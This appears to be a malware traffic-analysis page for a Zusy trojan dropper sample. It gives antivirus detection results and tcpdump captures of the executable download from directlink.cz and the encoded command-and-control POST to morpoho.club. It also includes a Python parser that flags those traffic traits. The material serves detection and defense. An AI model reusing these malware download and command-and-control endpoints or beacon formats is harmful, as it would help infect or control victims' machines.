

Zusy Malware Trojan Downloader Dropper PCAP file download traffic analysis POST /vad/order.php?page=106 morpoho.club

Download Attachments

  • 1 pcap 8848 (63 KB), added May 15, 2017 2:40 am by admin, 58 downloads

SHA256:          3977145723a78e6c2f70a2c5b05cc21e0f3a7552f66ae8223ed67c614819e6a4
File name:       8848275c18.exe
Detection ratio: 42 / 60
Analysis date:   2017-05-14 22:16:11 UTC

Engine                     Result                                           Update
Ad-Aware                   Gen:Variant.Zusy.236832                          20170514
AegisLab                   Backdoor.W32.Androm!c                            20170514
Antiy-AVL                  Trojan[Backdoor]/Win32.Androm                    20170514
Arcabit                    Trojan.Zusy.D39D20                               20170514
Avast                      Win32:Malware-gen                                20170514
AVG                        Inject3.CMBE                                     20170514
Avira (no cloud)           TR/Dropper.Gen                                   20170514
AVware                     Trojan.Win32.Generic!BT                          20170514
Baidu                      Win32.Trojan.WisdomEyes.16070401.9500.9986       20170503
BitDefender                Gen:Variant.Zusy.236832                          20170514
Bkav                       HW32.Packed.6A39                                 20170513
CrowdStrike Falcon (ML)    malicious_confidence_100% (W)                    20170130
DrWeb                      Trojan.Inject2.53489                             20170514
Emsisoft                   Gen:Variant.Zusy.236832 (B)                      20170514
Endgame                    malicious (high confidence)                      20170503
ESET-NOD32                 a variant of Win32/Injector.DOEX                 20170514
F-Secure                   Gen:Variant.Zusy.236832                          20170514
Fortinet                   W32/Androm.DOEX!tr.bdr


2017-05-14 21:39:18.826218 IP 192.168.1.102.58272 > 104.27.190.41.80: Flags [P.], seq 0:410, ack 1, win 256, length 410: HTTP: GET /download/8848275c18.exe HTTP/1.1
E…{.@……..fh..)…Pm.K.T.q7P….K..GET /download/8848275c18.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: directlink.cz
Connection: Keep-Alive

2017-05-14 21:39:30.280665 IP 192.168.1.102.58274 > 155.133.64.224.80: Flags [P.], seq 0:300, ack 1, win 256, length 300: HTTP: POST /vad/order.php?page=106 HTTP/1.1
E..T..@…C_…f..@….P….a>4(P…_…POST /vad/order.php?page=106 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: morpoho.club
Content-Length: 964
Cache-Control: no-cache

2017-05-14 21:39:30.553845 IP 192.168.1.102.58274 > 155.133.64.224.80: Flags [P.], seq 300:1264, ack 1, win 256, length 964: HTTP
E…..@…@….f..@….P….a>4(P….S..zyxwv=90f7e415a23ea48f3ca805f15a18dee69f&xurolifcz=63894569&bcdefgh=70F4990E4D2E32B7A5043C793383B2D4A4E0BE94CEAB7E6FFDA99B7FE5EF4B7B60C32C08DDBF02E4D61459E031A80E30402DAB7
1A5347429ABFA3D7EA44A94470D355070D15BA49CF46BD1005965CE8348B1018F0486FC5FF983905FC8FFA30EF38AD4B07F717E9B4DABCA6BFF6AD6598A7F3B6489ACFF37C666A3033CBEDFE8B65C019EFCF70723F66531A6A58E779C3B29801E4F137A20B91D8468BD
37687FBA04546C&dgjmpsvyb1=61F04BC27EF021C250F01EC245F003C243F01CC266F010C256F010C27EF01CC246F01FC251F02DC24FF006C254F010C258F005C25BF013C256F05FC247F009C247F0&dgjmpsvyb2=4BF014C25AF001C24EF01EC250F014C20CF014C25
AF014C2&dgjmpsvyb3=75F038C26CF05CC264F046C212F046C214F03AC276F020C213F021C217F02DC250F008C216F006C24CF0&dgjmpsvyb4=6BF01FC256F014C24EF059C270F058C202F032C24DF003C247F059C276F03CC20BF043C202F020C257F010C246F051C2
61F021C277F051C202F051C202F020C21AF042C212F041C202F051C262F051C210F05FC217F041C265F039C258F0&dgjmpsvyb5=74F03CC255F010C250F014C202F022C274F036C263F051C211F035C2
2017-05-14 21:39:30.912164 IP 192.168.1.102.58274 > 155.133.64.224.80: Flags [.], ack 287, win 255, length 0
E..(..@…D….f..@….P….a>5FP….=……..
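The capture above shows the two requests that make this sample recognisable on the wire: the GET for 8848275c18.exe from directlink.cz carries an Accept header that advertises image types, and the POST to morpoho.club /vad/order.php?page=106 is a form-urlencoded body whose every value is an opaque hex or numeric blob. The following parser is an added example written for this page; it is not code from the original post or from any tool the page mentions. It reads tcpdump -A style excerpts, pairs each POST with the later segment that carries its body (matched on the same source/destination tuple), and flags those two traits. The embedded sample is constructed from the requests on this page with the raw byte prefixes that tcpdump -A prints removed and the POST body truncated (the real body is 964 bytes); the finding tags are names chosen here, not from any signature set.

```python
"""Parse a tcpdump -A style HTTP excerpt into request records and flag the two
traits visible in the Zusy dropper capture on this page (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# One regex for the tcpdump summary line: timestamp, 4-tuple, payload length and,
# when tcpdump recognised HTTP, the request line it printed.
PKT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP "
    r"(?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): "
    r".*?length (?P<len>\d+)"
    r"(?:: HTTP(?:: (?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+)?)?"
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8,}$")   # opaque hex/numeric form values

# Constructed sample: the capture on this page, byte-dump prefixes removed and
# the 964-byte POST body truncated; the body is deliberately wrapped over two
# lines the way page extraction wraps it.
SAMPLE = """\
2017-05-14 21:39:18.826218 IP 192.168.1.102.58272 > 104.27.190.41.80: Flags [P.], seq 0:410, ack 1, win 256, length 410: HTTP: GET /download/8848275c18.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: directlink.cz
Connection: Keep-Alive

2017-05-14 21:39:30.280665 IP 192.168.1.102.58274 > 155.133.64.224.80: Flags [P.], seq 0:300, ack 1, win 256, length 300: HTTP: POST /vad/order.php?page=106 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: morpoho.club
Content-Length: 964
Cache-Control: no-cache

2017-05-14 21:39:30.553845 IP 192.168.1.102.58274 > 155.133.64.224.80: Flags [P.], seq 300:1264, ack 1, win 256, length 964: HTTP
zyxwv=90f7e415a23ea48f3ca805f15a18dee69f&xurolifcz=63894569&bcdefgh=70F4990E4D2E32B7A5043C793383B2D4A4E0BE94CEAB7E6FF
DA99B7FE5EF4B7B60C32C08DDBF02E4D6&dgjmpsvyb1=61F04BC27EF021C250F01EC245F003C243F01CC266F010C256F010C27EF01CC246F01FC251F0
2017-05-14 21:39:30.912164 IP 192.168.1.102.58274 > 155.133.64.224.80: Flags [.], ack 287, win 255, length 0
"""


def parse_capture(text):
    """Group lines into packets, then attach to each POST the later segment
    on the same 4-tuple that carries its body."""
    packets, current = [], None
    for line in text.splitlines():
        m = PKT_RE.match(line)
        if m:
            current = (m, [])
            packets.append(current)
        elif current is not None and line.strip():
            current[1].append(line.strip())
    requests, awaiting_body = [], {}
    for m, payload in packets:
        flow = (m["src"], m["sport"], m["dst"], m["dport"])
        if m["method"]:
            headers = {}
            for line in payload:
                name, sep, value = line.partition(":")
                if sep:
                    headers[name.strip().lower()] = value.strip()
            req = {"ts": m["ts"], "flow": flow, "method": m["method"],
                   "uri": m["uri"], "headers": headers, "body": ""}
            requests.append(req)
            if headers.get("content-length", "0") != "0":
                awaiting_body[flow] = req      # body arrives in a later segment
        elif flow in awaiting_body and payload:
            # A long body may be wrapped across lines by extraction; re-join it.
            awaiting_body.pop(flow)["body"] = "".join(payload)
    return requests


def flag_requests(requests):
    """Return (tag, detail) pairs for the two traits seen in this capture."""
    findings = []
    for r in requests:
        h, host = r["headers"], r["headers"].get("host", "?")
        path = urlsplit(r["uri"]).path.lower()
        # Trait 1: an executable fetched while Accept advertises image types,
        # a browser-like header set that does not fit the request.
        if (r["method"] == "GET" and path.endswith(".exe")
                and h.get("accept", "").startswith("image/")):
            findings.append(("exe-download-with-image-accept", host + r["uri"]))
        # Trait 2: a form POST whose every value is an opaque hex/numeric blob.
        if (r["method"] == "POST" and r["body"]
                and h.get("content-type", "").startswith("application/x-www-form-urlencoded")):
            fields = parse_qs(r["body"], keep_blank_values=True)
            values = [v for vs in fields.values() for v in vs]
            if values and all(HEX_RE.match(v) for v in values):
                findings.append(("opaque-hex-form-post",
                                 f"{host}{r['uri']} fields={sorted(fields)}"))
    return findings


if __name__ == "__main__":
    for tag, detail in flag_requests(parse_capture(SAMPLE)):
        print(f"{tag:32} {detail}")
```

Run against the sample, the script reports the directlink.cz download and the morpoho.club POST with its field names (bcdefgh, dgjmpsvyb1, xurolifcz, zyxwv). The body reassembly keys on the 4-tuple rather than on TCP sequence numbers, which is enough for a single-flow excerpt like this one; a full PCAP should be reassembled with a proper TCP stream reassembler before applying the same two checks.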
